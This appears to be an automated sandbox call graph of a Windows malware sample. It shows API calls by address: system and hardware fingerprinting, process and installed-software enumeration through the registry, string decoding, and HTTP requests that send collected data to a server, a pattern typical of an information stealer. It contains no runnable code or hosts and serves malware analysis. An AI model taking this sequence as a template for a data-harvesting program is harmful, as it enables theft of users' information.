59330 1952c8 59329->59330 59331 19a1f0 2 API calls 59330->59331 59334 1952d6 59331->59334 59332 195336 StrCmpCA 59335 195471 59332->59335 59332->59353 59333 194cd0 23 API calls 59333->59353 59336 19a1f0 2 API calls 59334->59336 59338 19a270 lstrcpy 59335->59338 59337 1952e5 59336->59337 59339 1816b0 lstrcpy 59337->59339 59340 19547d 59338->59340 59350 1952f1 59339->59350 59341 19a1f0 2 API calls 59340->59341 59344 19548b 59341->59344 59342 1954eb StrCmpCA 59346 195508 59342->59346 59347 1954f6 Sleep 59342->59347 59343 194da0 28 API calls 59343->59353 59345 19a1f0 2 API calls 59344->59345 59348 19549a 59345->59348 59349 19a270 lstrcpy 59346->59349 59347->59353 59351 1816b0 lstrcpy 59348->59351 59352 195514 59349->59352 59350->58413 59351->59350 59354 19a1f0 2 API calls 59352->59354 59353->59322 59353->59323 59353->59324 59353->59325 59353->59326 59353->59327 59353->59332 59353->59333 59353->59342 59353->59343 59358 19526a StrCmpCA 59353->59358 59360 19541f StrCmpCA 59353->59360 59361 181590 lstrcpy 59353->59361 59355 195523 59354->59355 59356 19a1f0 2 API calls 59355->59356 59357 195532 59356->59357 59359 1816b0 lstrcpy 59357->59359 59358->59353 59359->59350 59360->59353 59361->59353 59363 196fec 59362->59363 59364 196ff3 GetVolumeInformationA 59362->59364 59363->59364 59366 197031 59364->59366 59365 19709c GetProcessHeap RtlAllocateHeap 59367 1970b9 59365->59367 59368 1970c8 wsprintfA 59365->59368 59366->59365 59369 19a110 lstrcpy 59367->59369 59370 19a110 lstrcpy 59368->59370 59371 195887 59369->59371 59370->59371 59371->58434 59373 19a170 lstrcpy 59372->59373 59374 1848e9 59373->59374 60338 184800 59374->60338 59376 1848f5 59377 19a110 lstrcpy 59376->59377 59378 184927 59377->59378 59379 19a110 lstrcpy 59378->59379 59380 184934 59379->59380 59381 19a110 lstrcpy 59380->59381 59382 184941 59381->59382 59383 19a110 lstrcpy 59382->59383 59384 18494e 59383->59384 59385 19a110 lstrcpy 59384->59385 59386 18495b InternetOpenA StrCmpCA 59385->59386 59387 184994 59386->59387 59388 184f1b InternetCloseHandle 59387->59388 60346 198600 59387->60346 59390 184f38 59388->59390 60361 189b10 CryptStringToBinaryA 59390->60361 59391 1849b3 60354 19a2f0 59391->60354 59395 1849c6 59396 19a270 lstrcpy 59395->59396 59397 1849cf 59396->59397 59405 19a380 4 API calls 59397->59405 59398 19a1f0 2 API calls 59400 184f55 59398->59400 59399 184f77 ctype 59403 19a170 lstrcpy 59399->59403 59401 19a380 4 API calls 59400->59401 59402 184f6b 59401->59402 59404 19a270 lstrcpy 59402->59404 59416 184fa7 59403->59416 59404->59399 59406 1849f9 59405->59406 59407 19a270 lstrcpy 59406->59407 59408 184a02 59407->59408 59409 19a380 4 API calls 59408->59409 59410 184a21 59409->59410 59411 19a270 lstrcpy 59410->59411 59412 184a2a 59411->59412 59413 19a2f0 3 API calls 59412->59413 59414 184a48 59413->59414 59415 19a270 lstrcpy 59414->59415 59417 184a51 59415->59417 59416->58437 59418 19a380 4 API calls 59417->59418 59419 184a70 59418->59419 59420 19a270 lstrcpy 59419->59420 59421 184a79 59420->59421 59422 19a380 4 API calls 59421->59422 59423 184a98 59422->59423 59424 19a270 lstrcpy 59423->59424 59425 184aa1 59424->59425 59426 19a380 4 API calls 59425->59426 59427 184acd 59426->59427 59428 19a2f0 3 API calls 59427->59428 59429 184ad4 59428->59429 59430 19a270 lstrcpy 59429->59430 59431 184add 59430->59431 59432 184af3 InternetConnectA 59431->59432 59432->59388 59433 184b23 HttpOpenRequestA 59432->59433 59435 184b78 59433->59435 59436 184f0e InternetCloseHandle 59433->59436 59437 19a380 4 API calls 59435->59437 59436->59388 59438 184b8c 59437->59438 59439 19a270 lstrcpy 59438->59439 59440 184b95 59439->59440 59441 19a2f0 3 API calls 59440->59441 59442 184bb3 59441->59442 59443 19a270 lstrcpy 59442->59443 59444 184bbc 59443->59444 59445 19a380 4 API calls 59444->59445 59446 184bdb 59445->59446 59447 19a270 lstrcpy 59446->59447 59448 184be4 59447->59448 59449 19a380 4 API calls 59448->59449 59450 184c05 59449->59450 59451 19a270 lstrcpy 59450->59451 59452 184c0e 59451->59452 59453 19a380 4 API calls 59452->59453 59454 184c2e 59453->59454 59455 19a270 lstrcpy 59454->59455 59456 184c37 59455->59456 59457 19a380 4 API calls 59456->59457 59458 184c56 59457->59458 59459 19a270 lstrcpy 59458->59459 59460 184c5f 59459->59460 59461 19a2f0 3 API calls 59460->59461 59462 184c7d 59461->59462 59463 19a270 lstrcpy 59462->59463 59464 184c86 59463->59464 59465 19a380 4 API calls 59464->59465 59466 184ca5 59465->59466 59467 19a270 lstrcpy 59466->59467 59468 184cae 59467->59468 59469 19a380 4 API calls 59468->59469 59470 184ccd 59469->59470 59471 19a270 lstrcpy 59470->59471 59472 184cd6 59471->59472 59473 19a2f0 3 API calls 59472->59473 59474 184cf4 59473->59474 59475 19a270 lstrcpy 59474->59475 59476 184cfd 59475->59476 59477 19a380 4 API calls 59476->59477 59478 184d1c 59477->59478 59479 19a270 lstrcpy 59478->59479 59480 184d25 59479->59480 59481 19a380 4 API calls 59480->59481 59482 184d46 59481->59482 59483 19a270 lstrcpy 59482->59483 59484 184d4f 59483->59484 59485 19a380 4 API calls 59484->59485 59486 184d6f 59485->59486 59487 19a270 lstrcpy 59486->59487 59488 184d78 59487->59488 59489 19a380 4 API calls 59488->59489 59490 184d97 59489->59490 59491 19a270 lstrcpy 59490->59491 59492 184da0 59491->59492 59493 19a2f0 3 API calls 59492->59493 59494 184dbe 59493->59494 59495 19a270 lstrcpy 59494->59495 59496 184dc7 59495->59496 59497 19a110 lstrcpy 59496->59497 59498 184de2 59497->59498 59499 19a2f0 3 API calls 59498->59499 59500 184e03 59499->59500 59501 19a2f0 3 API calls 59500->59501 59502 184e0a 59501->59502 59503 19a270 lstrcpy 59502->59503 59504 184e16 59503->59504 59505 184e37 lstrlen 59504->59505 59506 184e4a 59505->59506 59507 184e53 lstrlen 59506->59507 60360 19a4a0 59507->60360 59509 184e63 HttpSendRequestA 59510 184e82 InternetReadFile 59509->59510 59511 184eb7 InternetCloseHandle 59510->59511 59516 184eae 59510->59516 59514 19a1d0 59511->59514 59513 19a380 4 API calls 59513->59516 59514->59436 59515 19a270 lstrcpy 59515->59516 59516->59510 59516->59511 59516->59513 59516->59515 60370 19a4a0 59517->60370 59519 1912d4 StrCmpCA 59520 1912df ExitProcess 59519->59520 59521 1912e7 59519->59521 59522 1914d2 59521->59522 59523 1913bd StrCmpCA 59521->59523 59524 1913df StrCmpCA 59521->59524 59525 19136d StrCmpCA 59521->59525 59526 19138f StrCmpCA 59521->59526 59527 191401 StrCmpCA 59521->59527 59528 191461 StrCmpCA 59521->59528 59529 191480 StrCmpCA 59521->59529 59530 191423 StrCmpCA 59521->59530 59531 191442 StrCmpCA 59521->59531 59532 19a1f0 lstrlen lstrcpy 59521->59532 59522->58439 59523->59521 59524->59521 59525->59521 59526->59521 59527->59521 59528->59521 59529->59521 59530->59521 59531->59521 59532->59521 59534 19a170 lstrcpy 59533->59534 59535 1859c9 59534->59535 59536 184800 5 API calls 59535->59536 59537 1859d5 59536->59537 59538 19a110 lstrcpy 59537->59538 59539 185a0a 59538->59539 59540 19a110 lstrcpy 59539->59540 59541 185a17 59540->59541 59542 19a110 lstrcpy 59541->59542 59543 185a24 59542->59543 59544 19a110 lstrcpy 59543->59544 59545 185a31 59544->59545 59546 19a110 lstrcpy 59545->59546 59547 185a3e InternetOpenA StrCmpCA 59546->59547 59548 185a6d 59547->59548 59549 186013 InternetCloseHandle 59548->59549 59550 198600 3 API calls 59548->59550 59551 186030 59549->59551 59552 185a8c 59550->59552 59554 189b10 4 API calls 59551->59554 59553 19a2f0 3 API calls 59552->59553 59555 185a9f 59553->59555 59556 186036 59554->59556 59557 19a270 lstrcpy 59555->59557 59558 19a1f0 2 API calls 59556->59558 59560 18606f ctype 59556->59560 59562 185aa8 59557->59562 59559 18604d 59558->59559 59561 19a380 4 API calls 59559->59561 59565 19a170 lstrcpy 59560->59565 59563 186063 59561->59563 59566 19a380 4 API calls 59562->59566 59564 19a270 lstrcpy 59563->59564 59564->59560 59574 18609f 59565->59574 59567 185ad2 59566->59567 59568 19a270 lstrcpy 59567->59568 59569 185adb 59568->59569 59570 19a380 4 API calls 59569->59570 59571 185afa 59570->59571 59572 19a270 lstrcpy 59571->59572 59573 185b03 59572->59573 59575 19a2f0 3 API calls 59573->59575 59574->58445 59576 185b21 59575->59576 59577 19a270 lstrcpy 59576->59577 59578 185b2a 59577->59578 59579 19a380 4 API calls 59578->59579 59580 185b49 59579->59580 59581 19a270 lstrcpy 59580->59581 59582 185b52 59581->59582 59583 19a380 4 API calls 59582->59583 59584 185b71 59583->59584 59585 19a270 lstrcpy 59584->59585 59586 185b7a 59585->59586 59587 19a380 4 API calls 59586->59587 59588 185ba6 59587->59588 59589 19a2f0 3 API calls 59588->59589 59590 185bad 59589->59590 59591 19a270 lstrcpy 59590->59591 59592 185bb6 59591->59592 59593 185bcc InternetConnectA 59592->59593 59593->59549 59594 185bfc HttpOpenRequestA 59593->59594 59596 185c5b 59594->59596 59597 186006 InternetCloseHandle 59594->59597 59598 19a380 4 API calls 59596->59598 59597->59549 59599 185c6f 59598->59599 59600 19a270 lstrcpy 59599->59600 59601 185c78 59600->59601 59602 19a2f0 3 API calls 59601->59602 59603 185c96 59602->59603 59604 19a270 lstrcpy 59603->59604 59605 185c9f 59604->59605 59606 19a380 4 API calls 59605->59606 59607 185cbe 59606->59607 59608 19a270 lstrcpy 59607->59608 59609 185cc7 59608->59609 59610 19a380 4 API calls 59609->59610 59611 185ce8 59610->59611 59612 19a270 lstrcpy 59611->59612 59613 185cf1 59612->59613 59614 19a380 4 API calls 59613->59614 59615 185d11 59614->59615 59616 19a270 lstrcpy 59615->59616 59617 185d1a 59616->59617 59618 19a380 4 API calls 59617->59618 59619 185d39 59618->59619 59620 19a270 lstrcpy 59619->59620 59621 185d42 59620->59621 59622 19a2f0 3 API calls 59621->59622 59623 185d60 59622->59623 59624 19a270 lstrcpy 59623->59624 59625 185d69 59624->59625 59626 19a380 4 API calls 59625->59626 59627 185d88 59626->59627 59628 19a270 lstrcpy 59627->59628 59629 185d91 59628->59629 59630 19a380 4 API calls 59629->59630 59631 185db0 59630->59631 59632 19a270 lstrcpy 59631->59632 59633 185db9 59632->59633 59634 19a2f0 3 API calls 59633->59634 59635 185dd7 59634->59635 59636 19a270 lstrcpy 59635->59636 59637 185de0 59636->59637 59638 19a380 4 API calls 59637->59638 59639 185dff 59638->59639 59640 19a270 lstrcpy 59639->59640 59641 185e08 59640->59641 59642 19a380 4 API calls 59641->59642 59643 185e29 59642->59643 59644 19a270 lstrcpy 59643->59644 59645 185e32 59644->59645 59646 19a380 4 API calls 59645->59646 59647 185e52 59646->59647 59648 19a270 lstrcpy 59647->59648 59649 185e5b 59648->59649 59650 19a380 4 API calls 59649->59650 59651 185e7a 59650->59651 59652 19a270 lstrcpy 59651->59652 59653 185e83 59652->59653 59654 19a2f0 3 API calls 59653->59654 59655 185ea4 59654->59655 59656 19a270 lstrcpy 59655->59656 59657 185ead 59656->59657 59658 185ec0 lstrlen 59657->59658 60371 19a4a0 59658->60371 59660 185ed1 lstrlen GetProcessHeap RtlAllocateHeap 60372 19a4a0 59660->60372 59662 185efe lstrlen 59663 185f0e 59662->59663 59664 185f27 lstrlen 59663->59664 59665 185f37 59664->59665 59666 185f40 lstrlen 59665->59666 59667 185f53 59666->59667 59668 185f6a lstrlen 59667->59668 60373 19a4a0 59668->60373 59670 185f7a HttpSendRequestA 59671 185f85 InternetReadFile 59670->59671 59672 185fba InternetCloseHandle 59671->59672 59676 185fb1 59671->59676 59672->59597 59674 19a380 4 API calls 59674->59676 59675 19a270 lstrcpy 59675->59676 59676->59671 59676->59672 59676->59674 59676->59675 59678 190b87 59677->59678 59679 190c61 59678->59679 59680 19a1f0 lstrlen lstrcpy 59678->59680 59679->58447 59680->59678 59682 1908c7 59681->59682 59683 190a27 59682->59683 59684 1909b4 StrCmpCA 59682->59684 59685 190937 StrCmpCA 59682->59685 59686 190977 StrCmpCA 59682->59686 59687 19a1f0 lstrlen lstrcpy 59682->59687 59683->58455 59684->59682 59685->59682 59686->59682 59687->59682 59692 190a77 59688->59692 59689 190ac2 StrCmpCA 59689->59692 59690 190b54 59690->58463 59691 19a1f0 lstrlen lstrcpy 59691->59692 59692->59689 59692->59690 59692->59691 59694 19a110 lstrcpy 59693->59694 59695 191536 59694->59695 59696 19a380 4 API calls 59695->59696 59697 191547 59696->59697 59698 19a270 lstrcpy 59697->59698 59699 191550 59698->59699 59700 19a380 4 API calls 59699->59700 59701 19156b 59700->59701 59702 19a270 lstrcpy 59701->59702 59703 191574 59702->59703 59704 19a380 4 API calls 59703->59704 59705 19158d 59704->59705 59706 19a270 lstrcpy 59705->59706 59707 191596 59706->59707 59708 19a380 4 API calls 59707->59708 59709 1915b1 59708->59709 59710 19a270 lstrcpy 59709->59710 59711 1915ba 59710->59711 59712 19a380 4 API calls 59711->59712 59713 1915d3 59712->59713 59714 19a270 lstrcpy 59713->59714 59715 1915dc 59714->59715 59716 19a380 4 API calls 59715->59716 59717 1915f7 59716->59717 59718 19a270 lstrcpy 59717->59718 59719 191600 59718->59719 59720 19a380 4 API calls 59719->59720 59721 191619 59720->59721 59722 19a270 lstrcpy 59721->59722 59723 191622 59722->59723 59724 19a380 4 API calls 59723->59724 59725 19163d 59724->59725 59726 19a270 lstrcpy 59725->59726 59727 191646 59726->59727 59728 19a380 4 API calls 59727->59728 59729 19165f 59728->59729 59730 19a270 lstrcpy 59729->59730 59731 191668 59730->59731 59732 19a380 4 API calls 59731->59732 59733 191686 59732->59733 59734 19a270 lstrcpy 59733->59734 59735 19168f 59734->59735 59736 196fa0 6 API calls 59735->59736 59737 1916a6 59736->59737 59738 19a2f0 3 API calls 59737->59738 59739 1916b9 59738->59739 59740 19a270 lstrcpy 59739->59740 59741 1916c2 59740->59741 59742 19a380 4 API calls 59741->59742 59743 1916ec 59742->59743 59744 19a270 lstrcpy 59743->59744 59745 1916f5 59744->59745 59746 19a380 4 API calls 59745->59746 59747 191715 59746->59747 59748 19a270 lstrcpy 59747->59748 59749 19171e 59748->59749 60374 197130 GetProcessHeap RtlAllocateHeap 59749->60374 59752 19a380 4 API calls 59753 19173e 59752->59753 59754 19a270 lstrcpy 59753->59754 59755 191747 59754->59755 59756 19a380 4 API calls 59755->59756 59757 191766 59756->59757 59758 19a270 lstrcpy 59757->59758 59759 19176f 59758->59759 59760 19a380 4 API calls 59759->59760 59761 191790 59760->59761 59762 19a270 lstrcpy 59761->59762 59763 191799 59762->59763 60381 197260 GetCurrentProcess IsWow64Process 59763->60381 59766 19a380 4 API calls 59767 1917b9 59766->59767 59768 19a270 lstrcpy 59767->59768 59769 1917c2 59768->59769 59770 19a380 4 API calls 59769->59770 59771 1917e1 59770->59771 59772 19a270 lstrcpy 59771->59772 59773 1917ea 59772->59773 59774 19a380 4 API calls 59773->59774 59775 19180b 59774->59775 59776 19a270 lstrcpy 59775->59776 59777 191814 59776->59777 59778 1972f0 3 API calls 59777->59778 59779 191824 59778->59779 59780 19a380 4 API calls 59779->59780 59781 191834 59780->59781 59782 19a270 lstrcpy 59781->59782 59783 19183d 59782->59783 59784 19a380 4 API calls 59783->59784 59785 19185c 59784->59785 59786 19a270 lstrcpy 59785->59786 59787 191865 59786->59787 59788 19a380 4 API calls 59787->59788 59789 191885 59788->59789 59790 19a270 lstrcpy 59789->59790 59791 19188e 59790->59791 59792 197380 3 API calls 59791->59792 59793 19189e 59792->59793 59794 19a380 4 API calls 59793->59794 59795 1918ae 59794->59795 59796 19a270 lstrcpy 59795->59796 59797 1918b7 59796->59797 59798 19a380 4 API calls 59797->59798 59799 1918d6 59798->59799 59800 19a270 lstrcpy 59799->59800 59801 1918df 59800->59801 59802 19a380 4 API calls 59801->59802 59803 191900 59802->59803 59804 19a270 lstrcpy 59803->59804 59805 191909 59804->59805 60383 197420 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 59805->60383 59808 19a380 4 API calls 59809 191929 59808->59809 59810 19a270 lstrcpy 59809->59810 59811 191932 59810->59811 59812 19a380 4 API calls 59811->59812 59813 191951 59812->59813 59814 19a270 lstrcpy 59813->59814 59815 19195a 59814->59815 59816 19a380 4 API calls 59815->59816 59817 19197b 59816->59817 59818 19a270 lstrcpy 59817->59818 59819 191984 59818->59819 60385 1974d0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 59819->60385 59822 19a380 4 API calls 59823 1919a4 59822->59823 59824 19a270 lstrcpy 59823->59824 59825 1919ad 59824->59825 59826 19a380 4 API calls 59825->59826 59827 1919cc 59826->59827 59828 19a270 lstrcpy 59827->59828 59829 1919d5 59828->59829 59830 19a380 4 API calls 59829->59830 59831 1919f5 59830->59831 59832 19a270 lstrcpy 59831->59832 59833 1919fe 59832->59833 60388 1975a0 GetUserDefaultLocaleName 59833->60388 59836 19a380 4 API calls 59837 191a1e 59836->59837 59838 19a270 lstrcpy 59837->59838 59839 191a27 59838->59839 59840 19a380 4 API calls 59839->59840 59841 191a46 59840->59841 59842 19a270 lstrcpy 59841->59842 59843 191a4f 59842->59843 59844 19a380 4 API calls 59843->59844 59845 191a70 59844->59845 59846 19a270 lstrcpy 59845->59846 59847 191a79 59846->59847 60393 197630 59847->60393 59849 191a90 59850 19a2f0 3 API calls 59849->59850 59851 191aa3 59850->59851 59852 19a270 lstrcpy 59851->59852 59853 191aac 59852->59853 59854 19a380 4 API calls 59853->59854 59855 191ad6 59854->59855 59856 19a270 lstrcpy 59855->59856 59857 191adf 59856->59857 59858 19a380 4 API calls 59857->59858 59859 191aff 59858->59859 59860 19a270 lstrcpy 59859->59860 59861 191b08 59860->59861 60405 197820 GetSystemPowerStatus 59861->60405 59864 19a380 4 API calls 59865 191b28 59864->59865 59866 19a270 lstrcpy 59865->59866 59867 191b31 59866->59867 59868 19a380 4 API calls 59867->59868 59869 191b50 59868->59869 59870 19a270 lstrcpy 59869->59870 59871 191b59 59870->59871 59872 19a380 4 API calls 59871->59872 59873 191b7a 59872->59873 59874 19a270 lstrcpy 59873->59874 59875 191b83 59874->59875 59876 191b8e GetCurrentProcessId 59875->59876 60407 198f10 OpenProcess 59876->60407 59879 19a2f0 3 API calls 59880 191bb4 59879->59880 59881 19a270 lstrcpy 59880->59881 59882 191bbd 59881->59882 59883 19a380 4 API calls 59882->59883 59884 191be7 59883->59884 59885 19a270 lstrcpy 59884->59885 59886 191bf0 59885->59886 59887 19a380 4 API calls 59886->59887 59888 191c10 59887->59888 59889 19a270 lstrcpy 59888->59889 59890 191c19 59889->59890 60412 1978a0 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 59890->60412 59893 19a380 4 API calls 59894 191c39 59893->59894 59895 19a270 lstrcpy 59894->59895 59896 191c42 59895->59896 59897 19a380 4 API calls 59896->59897 59898 191c61 59897->59898 59899 19a270 lstrcpy 59898->59899 59900 191c6a 59899->59900 59901 19a380 4 API calls 59900->59901 59902 191c8b 59901->59902 59903 19a270 lstrcpy 59902->59903 59904 191c94 59903->59904 60416 197a00 59904->60416 59907 19a380 4 API calls 59908 191cb4 59907->59908 59909 19a270 lstrcpy 59908->59909 59910 191cbd 59909->59910 59911 19a380 4 API calls 59910->59911 59912 191cdc 59911->59912 59913 19a270 lstrcpy 59912->59913 59914 191ce5 59913->59914 59915 19a380 4 API calls 59914->59915 59916 191d06 59915->59916 59917 19a270 lstrcpy 59916->59917 59918 191d0f 59917->59918 60429 197970 GetSystemInfo wsprintfA 59918->60429 59921 19a380 4 API calls 59922 191d2f 59921->59922 59923 19a270 lstrcpy 59922->59923 59924 191d38 59923->59924 59925 19a380 4 API calls 59924->59925 59926 191d57 59925->59926 59927 19a270 lstrcpy 59926->59927 59928 191d60 59927->59928 59929 19a380 4 API calls 59928->59929 59930 191d80 59929->59930 59931 19a270 lstrcpy 59930->59931 59932 191d89 59931->59932 60431 197ba0 GetProcessHeap RtlAllocateHeap 59932->60431 59935 19a380 4 API calls 59936 191da9 59935->59936 59937 19a270 lstrcpy 59936->59937 59938 191db2 59937->59938 59939 19a380 4 API calls 59938->59939 59940 191dd1 59939->59940 59941 19a270 lstrcpy 59940->59941 59942 191dda 59941->59942 59943 19a380 4 API calls 59942->59943 59944 191dfb 59943->59944 59945 19a270 lstrcpy 59944->59945 59946 191e04 59945->59946 60437 198260 59946->60437 59949 19a2f0 3 API calls 59950 191e2e 59949->59950 59951 19a270 lstrcpy 59950->59951 59952 191e37 59951->59952 59953 19a380 4 API calls 59952->59953 59954 191e61 59953->59954 59955 19a270 lstrcpy 59954->59955 59956 191e6a 59955->59956 59957 19a380 4 API calls 59956->59957 59958 191e8a 59957->59958 59959 19a270 lstrcpy 59958->59959 59960 191e93 59959->59960 59961 19a380 4 API calls 59960->59961 59962 191eb2 59961->59962 59963 19a270 lstrcpy 59962->59963 59964 191ebb 59963->59964 60442 197c90 59964->60442 59966 191ed2 59967 19a2f0 3 API calls 59966->59967 59968 191ee5 59967->59968 59969 19a270 lstrcpy 59968->59969 59970 191eee 59969->59970 59971 19a380 4 API calls 59970->59971 59972 191f1a 59971->59972 59973 19a270 lstrcpy 59972->59973 59974 191f23 59973->59974 59975 19a380 4 API calls 59974->59975 59976 191f42 59975->59976 59977 19a270 lstrcpy 59976->59977 59978 191f4b 59977->59978 59979 19a380 4 API calls 59978->59979 59980 191f6c 59979->59980 59981 19a270 lstrcpy 59980->59981 59982 191f75 59981->59982 59983 19a380 4 API calls 59982->59983 59984 191f94 59983->59984 59985 19a270 lstrcpy 59984->59985 59986 191f9d 59985->59986 59987 19a380 4 API calls 59986->59987 59988 191fbe 59987->59988 59989 19a270 lstrcpy 59988->59989 59990 191fc7 59989->59990 60450 197dc0 59990->60450 59992 191fe3 59993 19a2f0 3 API calls 59992->59993 59994 191ff6 59993->59994 59995 19a270 lstrcpy 59994->59995 59996 191fff 59995->59996 59997 19a380 4 API calls 59996->59997 59998 192029 59997->59998 59999 19a270 lstrcpy 59998->59999 60000 192032 59999->60000 60001 19a380 4 API calls 60000->60001 60002 192053 60001->60002 60003 19a270 lstrcpy 60002->60003 60004 19205c 60003->60004 60005 197dc0 17 API calls 60004->60005 60006 192078 60005->60006 60007 19a2f0 3 API calls 60006->60007 60008 19208b 60007->60008 60009 19a270 lstrcpy 60008->60009 60010 192094 60009->60010 60011 19a380 4 API calls 60010->60011 60012 1920be 60011->60012 60013 19a270 lstrcpy 60012->60013 60014 1920c7 60013->60014 60015 19a380 4 API calls 60014->60015 60016 1920e6 60015->60016 60017 19a270 lstrcpy 60016->60017 60018 1920ef 60017->60018 60019 19a380 4 API calls 60018->60019 60020 192110 60019->60020 60021 19a270 lstrcpy 60020->60021 60022 192119 60021->60022 60486 198120 60022->60486 60024 192130 60025 19a2f0 3 API calls 60024->60025 60026 192143 60025->60026 60027 19a270 lstrcpy 60026->60027 60028 19214c 60027->60028 60029 19216a lstrlen 60028->60029 60030 19217a 60029->60030 60031 19a110 lstrcpy 60030->60031 60032 19218c 60031->60032 60033 181590 lstrcpy 60032->60033 60034 19219d 60033->60034 60496 194c70 60034->60496 60036 1921a9 60036->58467 60684 19a4a0 60037->60684 60039 185059 InternetOpenUrlA 60040 185071 60039->60040 60041 18507a InternetReadFile 60040->60041 60042 1850f0 InternetCloseHandle InternetCloseHandle 60040->60042 60041->60040 60043 18513c 60042->60043 60043->58471 60685 189920 60044->60685 60330 19a170 lstrcpy 60329->60330 60331 1816c3 60330->60331 60332 19a170 lstrcpy 60331->60332 60333 1816d5 60332->60333 60334 19a170 lstrcpy 60333->60334 60335 1816e7 60334->60335 60336 19a170 lstrcpy 60335->60336 60337 1815a3 60336->60337 60337->59299 60366 181030 60338->60366 60342 184888 lstrlen 60369 19a4a0 60342->60369 60344 184898 InternetCrackUrlA 60345 1848b7 60344->60345 60345->59376 60347 19a110 lstrcpy 60346->60347 60348 198614 60347->60348 60349 19a110 lstrcpy 60348->60349 60350 198622 GetSystemTime 60349->60350 60351 198639 60350->60351 60352 19a170 lstrcpy 60351->60352 60353 19869c 60352->60353 60353->59391 60355 19a301 60354->60355 60356 19a358 60355->60356 60358 19a338 lstrcpy lstrcat 60355->60358 60357 19a170 lstrcpy 60356->60357 60359 19a364 60357->60359 60358->60356 60359->59395 60360->59509 60362 189b49 LocalAlloc 60361->60362 60363 184f3e 60361->60363 60362->60363 60364 189b64 CryptStringToBinaryA 60362->60364 60363->59398 60363->59399 60364->60363 60365 189b89 LocalFree 60364->60365 60365->60363 60367 18103a ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 60366->60367 60368 19a4a0 60367->60368 60368->60342 60369->60344 60370->59519 60371->59660 60372->59662 60373->59670 60503 197240 60374->60503 60377 197166 RegOpenKeyExA 60379 1971a4 RegCloseKey 60377->60379 60380 197187 RegQueryValueExA 60377->60380 60378 19172e 60378->59752 60379->60378 60380->60379 60382 1917a9 60381->60382 60382->59766 60384 191919 60383->60384 60384->59808 60386 19753a wsprintfA 60385->60386 60387 191994 60385->60387 60386->60387 60387->59822 60389 1975ed 60388->60389 60390 191a0e 60388->60390 60510 1987c0 LocalAlloc CharToOemW 60389->60510 60390->59836 60392 1975f9 60392->60390 60394 19a110 lstrcpy 60393->60394 60395 19766c GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 60394->60395 60396 1976c5 60395->60396 60397 1977b8 60396->60397 60398 1976e6 GetLocaleInfoA 60396->60398 60402 19a380 lstrcpy lstrlen lstrcpy lstrcat 60396->60402 60404 19a270 lstrcpy 60396->60404 60399 1977c8 60397->60399 60400 1977be LocalFree 60397->60400 60398->60396 60401 19a170 lstrcpy 60399->60401 60400->60399 60403 1977d7 60401->60403 60402->60396 60403->59849 60404->60396 60406 191b18 60405->60406 60406->59864 60408 198f33 K32GetModuleFileNameExA CloseHandle 60407->60408 60409 198f55 60407->60409 60408->60409 60410 19a110 lstrcpy 60409->60410 60411 191ba1 60410->60411 60411->59879 60413 197908 RegQueryValueExA 60412->60413 60414 191c29 60412->60414 60415 19792e RegCloseKey 60413->60415 60414->59893 60415->60414 60417 197a59 GetLogicalProcessorInformationEx 60416->60417 60418 197a78 GetLastError 60417->60418 60424 197ac9 60417->60424 60419 197ac2 60418->60419 60428 197a83 60418->60428 60420 191ca4 60419->60420 60514 198490 GetProcessHeap HeapFree 60419->60514 60420->59907 60513 198490 GetProcessHeap HeapFree 60424->60513 60426 197b1b 60426->60420 60427 197b24 wsprintfA 60426->60427 60427->60420 60428->60417 60428->60420 60511 198490 GetProcessHeap HeapFree 60428->60511 60512 1984b0 GetProcessHeap RtlAllocateHeap 60428->60512 60430 191d1f 60429->60430 60430->59921 60432 198450 60431->60432 60433 197bed GlobalMemoryStatusEx 60432->60433 60434 197c03 60433->60434 60435 197c3b wsprintfA 60434->60435 60436 191d99 60435->60436 60436->59935 60438 19829b GetProcessHeap RtlAllocateHeap wsprintfA 60437->60438 60440 19a110 lstrcpy 60438->60440 60441 191e1b 60440->60441 60441->59949 60443 19a110 lstrcpy 60442->60443 60447 197cc9 60443->60447 60444 197d03 60446 19a170 lstrcpy 60444->60446 60445 19a380 lstrcpy lstrlen lstrcpy lstrcat 60445->60447 60448 197d7c 60446->60448 60447->60444 60447->60445 60449 19a270 lstrcpy 60447->60449 60448->59966 60449->60447 60451 19a110 lstrcpy 60450->60451 60452 197dfc RegOpenKeyExA 60451->60452 60453 197e4e 60452->60453 60454 197e70 60452->60454 60455 19a170 lstrcpy 60453->60455 60456 197e98 RegEnumKeyExA 60454->60456 60457 1980b3 RegCloseKey 60454->60457 60466 197e5d 60455->60466 60458 197edf wsprintfA RegOpenKeyExA 60456->60458 60459 1980ae 60456->60459 60460 19a170 lstrcpy 60457->60460 60461 197f61 RegQueryValueExA 60458->60461 60462 197f25 RegCloseKey RegCloseKey 60458->60462 60459->60457 60460->60466 60464 197f9a lstrlen 60461->60464 60465 1980a1 RegCloseKey 60461->60465 60463 19a170 lstrcpy 60462->60463 60463->60466 60464->60465 60467 197fb0 60464->60467 60465->60459 60466->59992 60468 19a380 4 API calls 60467->60468 60469 197fc7 60468->60469 60470 19a270 lstrcpy 60469->60470 60471 197fd3 60470->60471 60472 19a380 4 API calls 60471->60472 60473 197ff7 60472->60473 60474 19a270 lstrcpy 60473->60474 60475 198003 60474->60475 60476 19800e RegQueryValueExA 60475->60476 60476->60465 60477 198043 60476->60477 60478 19a380 4 API calls 60477->60478 60479 19805a 60478->60479 60480 19a270 lstrcpy 60479->60480 60481 198066 60480->60481 60482 19a380 4 API calls 60481->60482 60483 19808a 60482->60483 60484 19a270 lstrcpy 60483->60484 60485 198096 60484->60485 60485->60465 60487 19a110 lstrcpy 60486->60487 60488 19815c CreateToolhelp32Snapshot Process32First 60487->60488 60489 198188 Process32Next 60488->60489 60490 1981fd FindCloseChangeNotification 60488->60490 60489->60490 60492 19819d 60489->60492 60491 19a170 lstrcpy 60490->60491 60493 198216 60491->60493 60492->60489 60494 19a380 lstrcpy lstrlen lstrcpy lstrcat 60492->60494 60495 19a270 lstrcpy 60492->60495 60493->60024 60494->60492 60495->60492 60497 19a170 lstrcpy 60496->60497 60498 194c95 60497->60498 60499 181590 lstrcpy 60498->60499 60500 194ca6 60499->60500 60515 185150 60500->60515 60502 194caf 60502->60036 60506 1971c0 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 60503->60506 60505 197159 60505->60377 60505->60378 60507 197220 RegCloseKey 60506->60507 60508 197205 RegQueryValueExA 60506->60508 60509 197233 60507->60509 60508->60507 60509->60505 